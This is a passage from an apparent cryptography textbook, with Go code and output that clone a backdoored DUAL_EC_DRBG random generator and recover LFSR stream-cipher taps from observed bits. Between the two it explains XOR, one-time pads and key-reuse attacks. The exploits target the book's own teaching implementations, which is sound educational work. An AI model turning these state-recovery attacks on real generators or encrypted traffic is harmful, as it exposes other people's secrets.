functions to exploit our DUAL_EC_DRBG implementation. The steps for our attack are:
Generate a backdoor-ed constant Q such that P = dQ. The value of d is secret and is
known only to the attacker.
Instantiate a DUAL_EC_DRBG generator with the backdoor-ed constants.
Generate two 30-byte values from the target RNG. Remember, each invocation of
DUAL_EC_DRBG generates 30 bytes.
For the first generated value, try plugging in all the values from 0000 to FFFF
(hexadecimal) as the two most significant bytes of the x coordinate and see if there is a
corresponding y coordinate that would make (x, y) lie on the elliptic curve.
Multiply this point by the secret value d to find the next state.
Use the newly calculated state to generate the next output.
These steps are visualized in figure 3.12.

Figure 3.12 Flow chart for exploiting DUAL_EC_DRBG

Let’s write a test for our exploit, as shown in listing 3.21. We will generate backdoor-ed
constants and use them to instantiate a DUAL_EC_DRBG RNG. We then call
CloneDualEcDrbg(...) on line 49, which takes the original RNG, the constants, as well
as the secret value d that will be used to compromise the RNG operation.
Listing 3.21 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg_test.go

38 func TestCloneDualEcDrbg(t *testing.T) {
39   p, q, d := GenerateBackdoorConstants()
40   drbg, err := impl_dual_ec_drbg.NewDualEcDrbg(p, q)
41   if err != nil {
42     t.Fatalf("error creating drbg: %s", err)
43   }
44   seed := new(big.Int).SetInt64(time.Now().Unix())
45   drbg.Seed(seed)
46   for i := 0; i < 100; i++ {
47     _ = drbg.Generate()
48   }
49   clonedDrbg, err := CloneDualEcDrbg(drbg, p, q, d)
50   if err != nil {
51     t.Fatalf("error brute forcing drbg: %s", err)
52   }
53   for i := 0; i < 100; i++ {
54     cloned := clonedDrbg.Generate()
55     observed := drbg.Generate()
56     if bytes.Compare(cloned, observed) != 0 {
57       t.Fatalf("observed=%s, cloned=%s", hex.EncodeToString(observed), hex.EncodeToString(cloned))
58     }
59     if i%20 == 0 {
60       t.Logf("observed=%s, cloned=%s", hex.EncodeToString(observed), hex.EncodeToString(cloned))
61     }
62   }
63 }

We can finally define CloneDualEcDrbg(...) to leverage the backdoor-ed constants
for cloning the RNG. The process is already outlined in figure 3.12, and the actual code
is shown in listing 3.22.

Listing 3.22 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

56 func CloneDualEcDrbg(drbg *impl_dual_ec_drbg.DualEcDrbg, p, q *impl_dual_ec_drbg.Point, d *big.Int) (*impl_dual_ec_drbg.DualEcDrbg, error) {
57   observed := drbg.Generate()
58   check := drbg.Generate()
59
60   curve := elliptic.P256()
61   fmt.Printf(" check: %s\n", hex.EncodeToString(check))
62   for i := uint16(0); i < 0xffff; i++ {
63     guess := make([]byte, 32)
64     binary.BigEndian.PutUint16(guess[0:2], i)
65     n := copy(guess[2:], observed)
66     if n != 30 {
67       return nil, errors.New("could not copy")
68     }
69     x := new(big.Int).SetBytes(guess)
70     y, err := CalculateYCoordinate(x)
71     if err != nil {
72       continue
73     }
74     nextS, _ := curve.ScalarMult(x, y, d.Bytes())
75     nextO, _ := curve.ScalarMult(q.X, q.Y, nextS.Bytes())
76     nextOLen := len(nextO.Bytes())
77     nextOTruncated := nextO.Bytes()[nextOLen-30:]
78     fmt.Printf("next_o: %s, guess: %04X\r", hex.EncodeToString(nextOTruncated), i)
79     if bytes.Compare(check, nextOTruncated) == 0 {
80       clonedDrbg, err := impl_dual_ec_drbg.NewDualEcDrbg(p, q)
81       if err != nil {
82         continue
83       }
84       fmt.Println()
85       clonedDrbg.Seed(nextS)
86       return clonedDrbg, nil
87     }
88   }
89   fmt.Println()
90   return nil, errors.New("could not find any points")
91 }

If you run the accompanying test using make dual_ec_drbg, you will see the test try
a few candidate values for x before finding the right one and then cloning the RNG. The
output is shown below (truncated for presentation):

Listing 3.23 Output for make dual_ec_drbg

go test -v ./ch03/dual_ec_drbg/exploit_dual_ec_drbg
=== RUN TestBackdoorConstants
--- PASS: TestBackdoorConstants (0.00s)
=== RUN TestCalculateYCoordinate
--- PASS: TestCalculateYCoordinate (0.00s)
=== RUN TestCloneDualEcDrbg
check: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85
next_o: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85, guess:
DCD2
exploit_dual_ec_drbg_test.go:60: observed=19fc85d9..., cloned=19fc85d9...
exploit_dual_ec_drbg_test.go:60: observed=9e12c097..., cloned=9e12c097...
exploit_dual_ec_drbg_test.go:60: observed=3ec6b2a4..., cloned=3ec6b2a4...
exploit_dual_ec_drbg_test.go:60: observed=01cf30cc..., cloned=01cf30cc...
exploit_dual_ec_drbg_test.go:60: observed=91d0b390..., cloned=91d0b390...
--- PASS: TestCloneDualEcDrbg (6.11s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/dual_ec_drbg/
exploit_dual_ec_drbg 6.124s

Congratulations, you have now implemented and exploited a bona fide CSPRNG by
performing a state-extension attack on it!

3.3 Summary
MT19937 is a widely-used RNG whose internal state consists of 624 values. It is
pretty straightforward to reverse one state value from one output, and therefore
only 624 output values are needed to recover the entire internal state of the
RNG (allowing an attacker to predict all future values).
DUAL_EC_DRBG is a CSPRNG, but its constants can be backdoor-ed in a way
that enables the attacker to predict all future values after observing only a couple of
generated values.
(CS)PRNGs can be compromised by reversing or predicting their internal states from
the generated values alone. The PRNG functions Next(...) and Output(...)
should make such reversals hard for an attacker.
4
Stream ciphers

This chapter covers
What is symmetric key encryption and what would make a symmetric encryption algorithm “perfect”?
What is the exclusive-or (XOR) operation, and how is it important for cryptography?
How can unbreakable encryption be achieved with one-time pad (OTP) and what are the practical limitations of this approach?
What are stream ciphers, and how are they related to one-time pad?
Implementing and exploiting linear-feedback shift registers (LFSRs) as stream ciphers
Implementing and exploiting the RC4 stream cipher

One of the core goals of cryptography is to provide confidentiality. Stream ciphers are
algorithms that help achieve confidentiality by encrypting plaintext one bit or one byte
at a time. They are used quite heavily in systems with limited computing power (e.g.,
embedded devices) or where performance requirements are quite high (e.g., for real-time
encryption of video calls). This chapter will explain what stream ciphers are, how they are
generally used and how attackers circumvent them.

4.1 Symmetric key encryption

Recall from chapter 1 that “symmetric” key encryption involves using the same key for
both the encryption and decryption operations, shown again for reference in figure 4.1.

Figure 4.1 Symmetric key encryption

As it happens, there is already a perfect, unbreakable algorithm for achieving this. It just
comes with some practical limitations that prevent it from becoming “one encryption
algorithm to rule them all.” Understanding those limitations will also shed further light on
the distinction between cryptographic theory and implementation; but before we get to
the limitations, let’s first discuss what it would mean for an encryption algorithm to be
“perfect”.
In chapter 1 we also briefly touched upon Kerckhoffs’ principle, which states that a
cryptosystem should be secure even if an attacker knows everything about the system except
the key. This was phrased by Claude Shannon (commonly known as the “father of
information theory”) as “the enemy knows the system”. Shannon went on to describe precisely
what it would mean for an encryption algorithm to provide perfect security: the ciphertext
should provide no information about the plaintext without knowledge of the secret key.
“Shannon ciphers” are symmetric encryption algorithms that satisfy this criterion.

Perfect security
An encrypted message must provide no information about the original plaintext unless
you have the secret key.

4.1.1 The exclusive-or (XOR) operation and its role in cryptography

Exclusive-or, or “XOR”, is a logical operation that we briefly encountered while discussing
the Mersenne Twister RNG in chapter 3. It takes two input bits (or Boolean values) and
outputs a single result. This is usually denoted by ⊕ in mathematical texts and by ^ in
programming languages (at least those whose bit-manipulation syntax is inspired by C).
The truth table for this operation is shown in table 4.1.

x   y   z = x ⊕ y
T   T   F
T   F   T
F   T   T
F   F   F
Table 4.1 Truth table (inputs and output) for the XOR operation

“Exclusive” refers to the fact that the result is true only if exactly one of the inputs is
true (i.e., the other one is false). We apply the exclusivity principle in daily life all the time.
For example, dual nationality is expressly forbidden for people born in certain countries.
They can remain citizens of their birth country or immigrate and get naturalized in a new
one, but they cannot legally retain citizenship of both countries (true ⊕ true is false). For a
given World Cup, a country can either win or lose the tournament but not both. Biological
organisms are either dead or alive (most of the time), and so on.
As it turns out, this almost wickedly simple operation protects the world’s information
by serving as a fundamental building block of cryptography. Let’s see how.
Imagine that x is the plaintext in figure 4.1, y is the key, and the result of the XOR
operation is the ciphertext, as shown in figure 4.2. This gives us the truth table shown
in table 4.2.

Plaintext (x)   Key (y)   Ciphertext (z = x ⊕ y)
0   0   0
0   1   1
1   0   1
1   1   0
Table 4.2 Truth table for the XOR operation as an encryption algorithm

If you receive ciphertext z and know the key y, you can simply XOR them to get back
x. In other words, we start from the right-most column (ciphertext) in table 4.2 and XOR
it with the middle column (key) to get back the left-most column (plaintext). For example,
if you receive the ciphertext 0 and the key is 1 (the bottom row), the exclusive-or results
in plaintext 1. Reading a row the other way around, encryption runs left to right while
decryption runs right to left. It might be helpful to do this exercise for all four rows to
grok the idea. In a nutshell, when using XOR as the encryption algorithm, encrypting and
then decrypting a piece of data under the same key produces back the original data.
Figure 4.2 Usage of XOR as a symmetric encryption algorithm

If an attacker gets hold of the ciphertext and does not know the key, can they “guess” the
plaintext? Let’s say the ciphertext is a 1 (the two middle rows in table 4.2). Since the key is
unknown, both plaintexts (0 or 1) are equally possible. In other words, the ciphertext
provides no information about the plaintext, making it perfectly secure.
XOR therefore satisfies two important criteria as an encryption algorithm:
When using the same key, decryption produces the original plaintext for a corre-
sponding ciphertext.
For a given ciphertext, if the key is unknown to the attacker, all plaintexts are equally
probable as the original message.

4.1.2 One-time pad and its practical limitations

As a matter of fact, if we could get a truly random stream of bits to use as the key, we
could generate as many key bits as there are plaintext bits and just use XOR as the encryption
algorithm. For example, if the plaintext is “HELLO WORLD” (11 bytes in most encodings),
we could use a TRNG to generate 88 random bits for the key and just XOR them
with the plaintext to get the encrypted ciphertext.
Known as the “one-time pad” (OTP), this approach to encryption is mathematically proven
to be perfectly secure. There are a few caveats, though, that make OTP impractical for
large-scale usage. As the name signifies, we need to generate a new key each time some
plaintext needs to be encrypted, and the key needs to be as long as the plaintext itself!
The usage of XOR is also susceptible to a “known-plaintext” attack. Equation 4.1 shows the
XOR encryption algorithm that we discussed above.

Plaintext ⊕ Key = Ciphertext (4.1)

Imagine that you use this algorithm with your own secret key to communicate with your
close friends. An attacker eavesdrops on your communications and gets hold of a bunch
of ciphertexts. They don’t know the key, but they guess that some of the plaintexts
probably start with “Hello” or some variation on common greetings. From there they can
recover the first few bytes of the key by rearranging the terms of equation 4.1. This is
actually quite a powerful technique; a variant of it was used to break the WEP protocol
(the first attempt by engineers to provide Wi-Fi security). We will discuss it in detail
in the upcoming sections and implement the exploit ourselves. For now, let’s familiarize
ourselves with the rearranged equation 4.2 to see how parts of the key can be recovered
by XORing the ciphertext and plaintext.

Key = Ciphertext ⊕ Plaintext (4.2)


Since the XOR operation cancels itself out, if you use the same key for different messages
(therefore violating the “one-timeness”), even if the attacker does not recover the key itself
they can simply XOR two ciphertexts together to get back an XORed version of the two
plaintexts, as shown in equation 4.3 (the key gets canceled out by XORing the ciphertexts).
This is known as a “key-reuse attack”.

Plaintext1 ⊕ Key = Ciphertext1
Plaintext2 ⊕ Key = Ciphertext2    (4.3)
Plaintext1 ⊕ Plaintext2 = Ciphertext1 ⊕ Ciphertext2

So, we have a few major challenges in using OTP or XOR as one encryption algorithm
to rule them all:
The key must be at least as long as the plaintext.
The key must be truly random.
The key must never be reused.
Imagine a TRNG generates as many bytes as needed for a plaintext. These bytes are
shared as the key with the intended recipient of our communication. Now we can send
one plaintext of that length and, assuming the attacker does not get hold of the key, we
attain perfect security.
Now imagine that the plaintext is actually a video, a high-resolution photo, or an
entire dossier. You would need to generate new keys, sometimes gigabytes long, somehow
transport those securely to the recipient, and then send the ciphertexts separately.
This all sounds highly impractical, but for specialized use-cases it actually isn’t. For
example, two parties could use some clever interpretation of specific phone directories
as “keys” and then use a one-time pad to encrypt small (one-liner) messages. Around a
hundred years ago this could actually have provided a significant level of security, assuming
the attacker wasn’t familiar with what was being used for the key. These days, however, even
if the source of the key was not known, the fact that phone directories are poor sources of
randomness would allow sophisticated adversaries to crack the key even without knowing the
specific booklet that was being used to generate it.
The problem of needing a key as long as the plaintext can be solved by using a CSPRNG.
A CSPRNG takes a “seed” as input and generates a stream of pseudorandom bytes. We
can use those bytes as the key to a one-time pad, as shown in figure 4.3. The “seed” of the
CSPRNG then becomes a shortened version of the key that can be shared with the
recipient. Instead of generating and sharing a random 5-gigabyte key to share a video
file, you can simply share a few hundred bytes of seed and then run the CSPRNG to
generate a “keystream”.

Figure 4.3 Stream ciphers: CSPRNG providing input key to a one-time pad

The construction shown in figure 4.3 is known as a “stream cipher”. This is in contrast to
“block” ciphers. The main difference between the two is that stream ciphers operate on a
stream of bits, i.e., they operate the exact same way regardless of whether the plaintext is
5 bits or 103 bits long. Block ciphers, on the other hand, group plaintext into
chunks called “blocks” as shown in figure 4.4. Block ciphers need to take some extra steps
if the plaintext does not fit neatly into equal-length chunks. Stream ciphers are comparatively
very fast but lack the property of diffusion, which we will explore in detail in chapter 5.
Because stream cipher keys must not be reused (or the attacker can simply XOR two
ciphertexts to obtain the XOR of two plaintexts), a new key should be generated for each mes-
sage encrypted by a stream cipher. This can be challenging; after all, each new key needs
to be communicated to the recipient securely somehow. The way this is ad-
dressed in practice is by using a nonce – a random number generated for each message and
sent in the clear along with it – that is combined with a fixed key to generate a
unique key for each message. The fixed part of the key is shared among the participants
(e.g., as a Wi-Fi password) while RNGs are used to generate the nonces that will be mixed
in.
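A minimal sketch of that per-message key derivation, with hash/fnv and math/rand as toy stand-ins for a real KDF and CSPRNG (the function names and values here are illustrative, not from the book’s code):

```go
package main

import (
	"fmt"
	"hash/fnv"
	"math/rand"
)

// perMessageKeystream derives a fresh keystream for every message by
// mixing a public nonce with the fixed shared key. FNV + math/rand are
// toy stand-ins for a real KDF + CSPRNG; do not use this for security.
func perMessageKeystream(fixedKey, nonce []byte, n int) []byte {
	h := fnv.New64a()
	h.Write(nonce)    // public, unique per message
	h.Write(fixedKey) // secret, shared once (e.g., the Wi-Fi password)
	prng := rand.New(rand.NewSource(int64(h.Sum64())))
	ks := make([]byte, n)
	for i := range ks {
		ks[i] = byte(prng.Intn(256))
	}
	return ks
}

func main() {
	key := []byte("shared-wifi-password")
	ks1 := perMessageKeystream(key, []byte{0x01, 0x02, 0x03}, 8)
	ks2 := perMessageKeystream(key, []byte{0x04, 0x05, 0x06}, 8)
	// Different nonces give different keystreams under the same fixed key.
	fmt.Printf("%x\n%x\n", ks1, ks2)
}
```

The recipient, who sees the nonce and already holds the fixed key, can rebuild the same keystream; an eavesdropper who sees only the nonce cannot.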

Cryptographic nonces
Many cryptographic algorithms require a nonce: short for “number used once”. These
are random bits that are communicated publicly – and are hence known to attackers
– but add unpredictability to the results of such algorithms.

We shall now look at two stream ciphers, implement them, and then exploit them using
their specific weaknesses.
Figure 4.4 Stream ciphers versus block ciphers

4.2 Linear Feedback Shift Registers (LFSRs)


“Says You!” is a popular word game quiz show that has been going on for about a quarter
of a century. The very first episode that I caught on the radio had the contestants attempting to
determine which definition was the correct one for the word “ouroboros”. Unfortunately
I have since forgotten the two incorrect definitions (one of them was likely a misdirection
on account of the phonetic similarity to “aurora borealis”), but I do recall that none of the con-
testants recognized it correctly as denoting an ancient symbol of a snake eating
its own tail – it just sounded ridiculous. It turns out that not only was that the right definition,
it has applications in cryptography!
“Shift registers” are a type of electronic logic circuit that stores and outputs data by
moving bits one position in a given direction at every step. Figure 4.5 shows a few
steps of a shift register outputting bits. On each step a new bit is inserted from the left,
all the bits are moved to the right, and the right-most bit is output as the result. They can
be thought of as “First-In First-Out” (FIFO) queues, like the ones we form at bank or grocery
counters.
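A plain shift register, before any feedback is added, can be modeled in a few lines of Go (a toy model of figure 4.5, with a made-up initial fill):

```go
package main

import "fmt"

// shiftRegister models figure 4.5: on each step a new bit enters on the
// left, everything moves one position right, and the right-most bit is
// emitted as output.
type shiftRegister struct {
	bits []byte
}

func (sr *shiftRegister) step(in byte) byte {
	out := sr.bits[len(sr.bits)-1]
	copy(sr.bits[1:], sr.bits[:len(sr.bits)-1]) // move everything right
	sr.bits[0] = in                             // new bit enters on the left
	return out
}

func main() {
	sr := &shiftRegister{bits: []byte{1, 0, 1, 1}}
	for _, in := range []byte{0, 0, 0} {
		fmt.Print(sr.step(in)) // bits leave in FIFO order: 1, 1, 0
	}
	fmt.Println()
}
```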

Figure 4.5 A shift register outputting three bits

A linear feedback shift register works similarly. At each step it moves the internal contents
one bit in some direction, outputs the “ejected” bit as the result of that iteration and then
XORs some of the previous bits to generate a new “shift” bit that it inserts at the other end
to keep things moving. A few iterations of an example LFSR are shown in figure 4.6 – if
you squint hard enough you might be able to see an ouroboros!

Figure 4.6 A “linear feedback” shift register showing execution of first few steps

This configuration is known as a “Fibonacci” LFSR. There is another class of LFSRs
called “Galois” LFSRs, which XOR the ejected bit into the state at each tap location, as
opposed to Fibonacci LFSRs, which XOR the tapped bits together once to produce the
new shift-in bit. We shall be implementing and exploiting Fibonacci LFSRs in the next
two sections. LFSRs have a “length” which simply denotes how many bits their internal
state holds. All LFSRs also have a “period” after which their output starts repeating itself.
The maximum period of an LFSR of length L is equal to 2^L − 1.
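We can check the 2^L − 1 bound empirically for a small LFSR. The sketch below steps a length-4 Fibonacci LFSR whose taps correspond to the primitive polynomial x^4 + x + 1 (a tap choice picked for this illustration, not the book’s example) and counts steps until the state repeats:

```go
package main

import "fmt"

// step advances a 4-bit Fibonacci LFSR one tick: the two right-most
// cells are XORed to form the new shift-in bit (this tap choice
// corresponds to the primitive polynomial x^4 + x + 1).
func step(s [4]byte) [4]byte {
	newBit := s[2] ^ s[3]
	return [4]byte{newBit, s[0], s[1], s[2]}
}

// period counts how many steps it takes for the state to repeat.
func period(start [4]byte) int {
	s, n := step(start), 1
	for s != start {
		s, n = step(s), n+1
	}
	return n
}

func main() {
	// A maximal-length LFSR of length 4 repeats after 2^4 - 1 = 15 steps.
	fmt.Println(period([4]byte{1, 0, 0, 0})) // 15
}
```

A non-primitive tap choice would cycle sooner than 2^L − 1, which is why taps are chosen from primitive polynomials in practice.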

4.2.1 Implementing LFSRs


LFSRs need to keep track of two things: (1) their current state and (2) the positions of the
feedback taps. This is shown in listing 4.1 where the LFSR struct has three fields. While the
state and taps could be bool slices (they only store a single bit in each location), defining
them as byte slices makes XORing easier (you cannot XOR bools in Go). And while the struct
does not need to keep track of length (since len(state) carries the same information),
we keep it as a separate field to improve the readability of the example code.

Listing 4.1 ch04/lfsr/impl_lfsr/impl_lfsr.go

12 package impl_lfsr
13
14 type LFSR struct {
15     length int
16     taps   []byte
17     state  []byte
18 }
19
20 func NewLFSR(length int, taps []byte, state []byte) *LFSR {
21     lfsr := &LFSR{
22         length,
23         make([]byte, len(taps)),
24         make([]byte, len(state)),
25     }
26
27     copy(lfsr.state, state)
28     copy(lfsr.taps, taps)
29
30     for i := 0; i < length; i++ {
31         lfsr.GenerateBit()
32     }
33
34     return lfsr
35 }

Figure 4.7 An LFSR providing the keystream for encryption using XOR

The output of an LFSR can be used as the “keystream” for a XOR function to simulate
a one-time pad as shown in figure 4.7. This makes the initial state of the LFSR the
“key” for our encryption. The distinction between the key and the keystream is important
to understand. The key is what you use to start the LFSR, in a manner of speaking. The
keystream is what actually gets XORed with the plaintext. Let’s say the initial key is the
Wi-Fi password. If attackers could somehow compromise a keystream, they could decrypt
a packet that was encrypted using that particular keystream. They still could not craft new
packets that would be decrypted correctly by the router. If they knew the seed,
however – the equivalent of the Wi-Fi password – they would be able to craft correctly en-
crypted packets of their own. Fortunately, while Wi-Fi uses stream ciphers it does not use
LFSRs. Unfortunately, the first few iterations of Wi-Fi security did use a different stream
cipher (RC4) that turned out to be insecure – which we will implement and exploit in the
next section.
Before we use our LFSR for encryption though, let’s put some dis-
tance between the key and the keystream. Lines 30 - 32 in listing 4.1 show the LFSR “wast-
ing” the first N bits, where N is equal to the length of the LFSR. This simply flushes out
the initial key bits, making sure encryption only happens by XORing plaintext with a linear
combination of the original key but not the original key itself.
The workhorse of our LFSR implementation is the GenerateBit() function shown in
listing 4.2. It corresponds closely to the operation shown in figure 4.6. We store the old
“right-most” bit in outputBit. Lines 40 - 42 calculate the new “shift-in” bit by traversing
all bits of the LFSR state and XORing those where a tap is active at the corresponding
index. Lines 44 - 46 move the contents of all registers one position to the right, and we
finally set the left-most bit in the LFSR state to the newly calculated shift bit.

Listing 4.2 ch04/lfsr/impl_lfsr/impl_lfsr.go

36 func (lfsr *LFSR) GenerateBit() byte {
37     outputBit := lfsr.state[lfsr.length-1]
38
39     newShiftBit := byte(0x00)
40     for i := 0; i < lfsr.length; i++ {
41         newShiftBit = newShiftBit ^ (lfsr.taps[i] & lfsr.state[i]) // Calculate new shift bit
42     }
43
44     for i := lfsr.length - 1; i > 0; i-- {
45         lfsr.state[i] = lfsr.state[i-1] // Right-shift the internal state
46     }
47
48     lfsr.state[0] = newShiftBit
49
50     return outputBit
51 }

Encryption is a straightforward XOR with one caveat: we need to call GenerateBit() 8
times to generate one byte of keystream, as shown in listing 4.3.

Listing 4.3 ch04/lfsr/impl_lfsr/impl_lfsr.go

53 func (lfsr *LFSR) Encrypt(plaintext []byte) []byte {
54     result := make([]byte, len(plaintext))
55
56     for i := 0; i < len(plaintext); i++ {
57         keyStream := byte(0x00)
58         for j := 7; j >= 0; j-- {
59             keyStream = keyStream ^ (lfsr.GenerateBit() << j)
60         }
61         result[i] = keyStream ^ plaintext[i]
62     }
63
64     return result
65 }

The test cases for this LFSR implementation can be found in the accompanying code
repo at: github.com/krkhan/crypto-impl-exploit
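As a quick sanity check of the XOR symmetry, here is a condensed, self-contained re-statement of listings 4.1-4.3 (names abbreviated, and the taps and key values made up for the demo) showing that encrypting the ciphertext with an identically configured LFSR returns the plaintext:

```go
package main

import "fmt"

// lfsr is a condensed version of the LFSR from listings 4.1-4.3,
// just enough to demonstrate the encrypt/decrypt roundtrip.
type lfsr struct {
	taps, state []byte
}

func newLFSR(taps, state []byte) *lfsr {
	l := &lfsr{append([]byte{}, taps...), append([]byte{}, state...)}
	for range l.state { // flush the initial key bits
		l.generateBit()
	}
	return l
}

func (l *lfsr) generateBit() byte {
	out := l.state[len(l.state)-1]
	var newBit byte
	for i, tap := range l.taps {
		newBit ^= tap & l.state[i]
	}
	copy(l.state[1:], l.state[:len(l.state)-1]) // shift right
	l.state[0] = newBit
	return out
}

func (l *lfsr) encrypt(data []byte) []byte {
	result := make([]byte, len(data))
	for i := range data {
		var ks byte
		for j := 7; j >= 0; j-- { // 8 bits -> 1 keystream byte
			ks ^= l.generateBit() << j
		}
		result[i] = ks ^ data[i]
	}
	return result
}

func main() {
	taps := []byte{0, 0, 1, 1} // made-up tap positions
	key := []byte{1, 0, 1, 1}  // made-up initial state (the "key")
	ct := newLFSR(taps, key).encrypt([]byte("ATTACK AT DAWN"))
	pt := newLFSR(taps, key).encrypt(ct)
	fmt.Println(string(pt)) // ATTACK AT DAWN
}
```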

4.2.2 Exploiting LFSRs


Can we find out the taps of an LFSR just by observing its output stream? Let’s first simplify
the problem by assuming that the attacker knows the length of the LFSR (i.e., how many
bits its internal state consists of).
REVERSING LFSR TAPS WHEN ITS LENGTH IS KNOWN
The operation of an LFSR with L taps can be described by equation 4.4, which says
“s(n+1) (each new sample in the sequence) is obtained by multiplying the previous L values of
s with the corresponding taps in a and adding the products together”. Multiplication and
addition in this context denote the logical AND and XOR operations respectively. We saw the
code for GenerateBit() in listing 4.2 implement this equation using boolean operations.

s(n+1) = a0 s(n−L+1) + ... + a(L−2) s(n−1) + a(L−1) s(n)    (4.4)


Let’s say we are working with an LFSR of length 3. It has initial state (s0, s1, s2). Equa-
tion 4.5 shows the new states for the first few iterations.

s3 = a0 s0 + a1 s1 + a2 s2
s4 = a0 s1 + a1 s2 + a2 s3        (4.5)
s5 = a0 s2 + a1 s3 + a2 s4

Equation 4.4 can then be represented in matrix form as shown in equation 4.6.

[ s3 ]   [ s0  s1  s2 ] [ a0 ]
[ s4 ] = [ s1  s2  s3 ] [ a1 ]        (4.6)
[ s5 ]   [ s2  s3  s4 ] [ a2 ]

X = SA

S is the “state matrix” and denotes internal contents of the LFSR. A is the “coefficient
matrix” and represents the LFSR taps. X represents L new bits that are obtained by the
linear combination of S and A.
We can find the coefficient matrix A by inverting S, collecting enough bits to fill X,
and then solving for A as shown in equation 4.7.

A = S^-1 X        (4.7)
We will use the matrix Go module from the OpenWhiteBox (github.com/OpenWhiteBox
/primitives/matrix) project for matrix inversion. Since we are dealing with “boolean” ma-
trices (they will only contain zeros or ones), the module also takes care of the fact that their
addition and multiplication are in fact bitwise XOR and bitwise AND respectively.
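The module hides the linear algebra, so as an illustration of what “inverting a boolean matrix” involves, here is a from-scratch Gaussian elimination over GF(2) solving S·A = X for a toy length-3 LFSR (the bit sequence and taps are an example made up for this sketch, not the book’s exploit code):

```go
package main

import "fmt"

// solveGF2 solves the linear system S*A = X over GF(2) (addition is
// XOR, multiplication is AND) using Gaussian elimination. It returns
// nil if S is singular. This is a from-scratch sketch of what the
// OpenWhiteBox matrix module's Invert/Compose calls do for us.
func solveGF2(S [][]byte, X []byte) []byte {
	n := len(S)
	// Build the augmented matrix [S | X].
	aug := make([][]byte, n)
	for i := range aug {
		aug[i] = append(append([]byte{}, S[i]...), X[i])
	}
	for col := 0; col < n; col++ {
		// Find a pivot row with a 1 in this column.
		pivot := -1
		for row := col; row < n; row++ {
			if aug[row][col] == 1 {
				pivot = row
				break
			}
		}
		if pivot == -1 {
			return nil // singular: not an LFSR stream (or wrong length)
		}
		aug[col], aug[pivot] = aug[pivot], aug[col]
		// XOR the pivot row into every other row with a 1 in this column.
		for row := 0; row < n; row++ {
			if row != col && aug[row][col] == 1 {
				for k := 0; k <= n; k++ {
					aug[row][k] ^= aug[col][k]
				}
			}
		}
	}
	A := make([]byte, n)
	for i := 0; i < n; i++ {
		A[i] = aug[i][n] // the augmented column now holds the solution
	}
	return A
}

func main() {
	// Bits observed from a length-3 LFSR with taps (1, 0, 1):
	s := []byte{1, 0, 0, 1, 1, 1}
	S := [][]byte{
		{s[0], s[1], s[2]},
		{s[1], s[2], s[3]},
		{s[2], s[3], s[4]},
	}
	X := []byte{s[3], s[4], s[5]}
	fmt.Println(solveGF2(S, X)) // [1 0 1]
}
```

The nil return for a singular S is exactly the failure mode the exploit code leans on later when guessing unknown LFSR lengths.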

Listing 4.4 ch04/lfsr/exploit_lfsr/exploit_lfsr.go

 1 package exploit_lfsr
 2
 3 import (
 4     "errors"
 5
 6     "github.com/OpenWhiteBox/primitives/matrix"
 7     "github.com/krkhan/crypto-impl-exploit/ch04/lfsr/impl_lfsr"
 8 )
 9
10 const MaxLfsrLength = 256
11
12 func RecoverLFSRWithKnownLengthFromObservedBits(observedBits []byte, lfsrLength int) (*impl_lfsr.LFSR, error) {
13     if len(observedBits) < lfsrLength*2 { // Do we have enough bits to fill sMatrix?
14         return nil, errors.New("insufficient observed bits")
15     }
16
17     sMatrix := matrix.GenerateEmpty(lfsrLength, lfsrLength)
18     for i := 0; i < lfsrLength; i++ {
19         for j := 0; j < lfsrLength; j++ {
20             sMatrix[i].SetBit(j, observedBits[i+j] != 0x00) // Logically: sMatrix[i][j] = observedBits[i+j]
21         }
22     }
23
24     sInvertMatrix, ok := sMatrix.Invert()
25     if !ok {
26         return nil, errors.New("invert matrix does not exist")
27     }
28
29     xMatrix := matrix.GenerateEmpty(lfsrLength, 1)
30     for i := 0; i < lfsrLength; i++ {
31         xMatrix[i].SetBit(0, observedBits[lfsrLength+i] != 0x00)
32     }
33     tapsMatrix := sInvertMatrix.Compose(xMatrix) // A = S^-1 X
34
35     recoveredTaps := make([]byte, lfsrLength) // Convert tapsMatrix to a regular byte slice of size lfsrLength
36     for i := 0; i < lfsrLength; i++ {
37         recoveredTaps[lfsrLength-i-1] = tapsMatrix[i].GetBit(0)
38     }
39
40     recoveredState := make([]byte, lfsrLength)
41     for i := 0; i < lfsrLength; i++ {
42         recoveredState[i] = observedBits[len(observedBits)-1-i]
43     }
44
45     return impl_lfsr.NewLFSR(lfsrLength, recoveredTaps, recoveredState), nil
46 }

The function shown on line 12 of listing 4.4 takes a slice of observed bits and the length
of the LFSR it is trying to recover. At line 13 we check that we have enough bits to fill up
the square matrix S in equation 4.6. Lines 17 - 22 fill sMatrix with the observed bits by
calling the SetBit() method on each row of the newly created matrix. Line 24 tries to
calculate S^-1. This step will fail if the bitstream is not the output of an LFSR (i.e., the
bitstream is not a linear combination), or if we have provided the wrong length for the
LFSR. We then generate the single-column xMatrix containing lfsrLength rows.
We finally implement equation 4.7 on line 33. Lines 35 - 38 convert tapsMatrix
back to a regular byte slice. Now that we have the tap positions reversed we can create
our own cloned LFSR, but we need to put it in the same state as the one we are trying
to exploit. Fortunately this part is easy: the last lfsrLength observed bits
tell us the LFSR state, as read in lines 40 - 43. The last line in the function returns a new LFSR
created using the taps and state we just recovered.
REVERSING LFSR TAPS WHEN ITS LENGTH IS NOT KNOWN
In the previous section we recovered the taps of an LFSR by observing its output and
constructing matrices related to the LFSR’s length L. If we are observing the output of a totally
unknown LFSR and have no clue about the length, can we still crack it?
There is a really sophisticated solution to this problem known as the Berlekamp-Massey
algorithm. It finds the shortest LFSR (taps and initial state) that would produce any given
binary sequence. Although the algorithm is simple to implement and beautiful to see in
action, it is hard to understand why it works without deep mathematical context and
explanation – it is after all named after two Shannon award winners (the Nobel Prize of
information theory): James Massey and Elwyn Berlekamp. As I struggled with grokking why
it works I thought of a rather ugly workaround: we can just try all lengths one by one. Incorrect
lengths fail on line 24 of listing 4.4 (the matrix inversion) until we hit the correct length.
LFSR lengths are usually not that huge – even a 32-bit-long LFSR can have a period
greater than 4 billion. Running our matrix-reversal exploit 32 times takes less than a
second on a modern laptop. Therefore, since the brute-force solution is quite practical
and much simpler to understand, we’ll use it for our exploit instead of the more efficient
Berlekamp-Massey algorithm. Listing 4.5 shows us trying different LFSR lengths until we
recover one without error.

